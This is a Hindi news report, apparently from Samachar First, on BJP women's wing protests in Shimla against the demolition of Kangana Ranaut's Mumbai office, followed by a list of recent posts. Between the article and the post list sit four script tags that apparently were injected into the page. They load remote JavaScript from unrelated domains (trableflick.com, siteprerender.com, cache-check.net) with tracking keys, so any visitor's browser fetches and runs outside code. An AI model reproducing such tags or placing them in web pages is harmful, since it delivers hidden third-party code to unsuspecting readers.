Categories: हिमाचल

कंगना का घर तोड़ने पर गुस्से में हिमाचल की महिलाएं, उद्धव ठाकरे, संजय राउत और राहुल गांधी को भेजी चूड़ियां

<p>महाराष्ट्र में कंगना रनौत के ऑफिस को बीएमसी द्वारा तोड़े जाने के बाद हिमाचल प्रदेश में लोग कंगना के समर्थन में सड़कों पर उतर आए हैं और इस घटना के खिलाफ रोष व्यक्त कर रहे हैं। शिमला में भाजपा महिला मोर्चा और विभिन्न धार्मिक और सामाजिक संगठनों ने मिल कर महाराष्ट्र सरकार और कांग्रेस के खिलाफ धरना प्रदर्शन और नारेबाजी की। महिलाओं ने कहा कि कंगना रनौत हिमाचल की बेटी है। प्रदेश की सभी महिलाएं और लोग कंगना के साथ खड़े है। कंगना का ऑफिस तोडना गैर क़ानूनी है क्यूंकि 30 सितम्बर तक महाराष्ट्र में तोड़-फोड़ करना प्रतिबंधित है फिर भी कंगना का दफ्तर तोड़ा गया।</p>

<p>भाजपा महिला मोर्चा कि प्रदेश महामंत्री शीतल व्यास ने कहा कि कंगना ने सुशांत और ड्रग्स को लेकर अपनी आवाज बुलंद की है इसलिए महाराष्ट्र सरकार ने इस तरह की कायराना हरकत की है। शिवसेना शेरों की पार्टी कही जाती है लेकिन जो घटना हिमाचल की बेटी के साथ की गयी है वह हरकत गीदढ़ की है।</p>

<p>महिला मोर्चा हिमाचल की अध्यक्ष जो पहले ही कंगना के घर तोड़ने के बदले प्रियंका गांधी के शिमला में घर तोड़ने की धमकी दे चुकी हैं। उन्होंने कहा है कि कांग्रेस पार्टी जो महिला के अधिकारों और सुरक्षा की दुहाई देती है वह पूरे मामले को लेकर चुप है। महिला मोर्चा ने कंगना के साथ हुई इस घटना के लिए उद्धव ठाकरे, संजय राउत और राहुल गांधी को चूड़ियां भेजी हैं और चेतावनी दी है कि अगर शिवसेना अपनी हरकतों से बाज नहीं आया तो हिमाचल से हजारों महिलायें महाराष्ट्र जाकर शिवसेना के दफ्तर का घेराव करेंगी।</p>

<p>&nbsp;</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1599723507969″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

आरिफ मोहम्मद खान ने राज्यपाल शिव प्रताप शुक्ल से भेंट की

Shimla: केरल के राज्यपाल आरिफ मोहम्मद खान अपने तीन दिवसीय हिमाचल दौरे के दौरान आज…

4 hours ago

प्रदेश की आर्थिक बदहाली के लिए भाजपा का आर्थिक कुप्रबंधन जिम्मेदार: कांग्रेस

प्रदेश की आर्थिक बदहाली के लिए भाजपा का आर्थिक कुप्रबंधन जिम्मेदार : कांग्रेस  चुनाव जीतने…

4 hours ago

भाजपा ने किया शिक्षा का बेड़ा गर्क, हमने किए सुधार: रोहित ठाकुर

भाजपा ने किया शिक्षा का बेड़ा गर्क, हमने किए सुधार: रोहित ठाकुर  शिक्षा में सुधार…

4 hours ago

किन्नौर पहुंचे नेता प्रतिपक्ष, पन्ना प्रमुख सम्मेलन को संबोधित कर कंगना के लिए मांगे वोट

किन्नौर पहुँचे नेता प्रतिपक्ष, पन्ना प्रमुख सम्मेलन को संबोधित कर कंगना के लिए मांगे वोट…

4 hours ago

राष्ट्रपति का 4 से 8 मई तक हिमाचल दौरा, मुख्य सचिव ने लिया तैयारियों का जायजा

राष्ट्रपति द्रौपदी मुर्मू के शिमला दौरे की तैयारियां इन दिनों जोरों पर हैं। 4 मई…

4 hours ago

विश्वविद्यालय के वाणिज्य में PHD के ST आरक्षित पद को रातों रात बना दिया गया सामान्य वर्ग

विश्वविद्यालय के वाणिज्य में PHD के ST आरक्षित पद को रातों रात बना दिया गया…

4 hours ago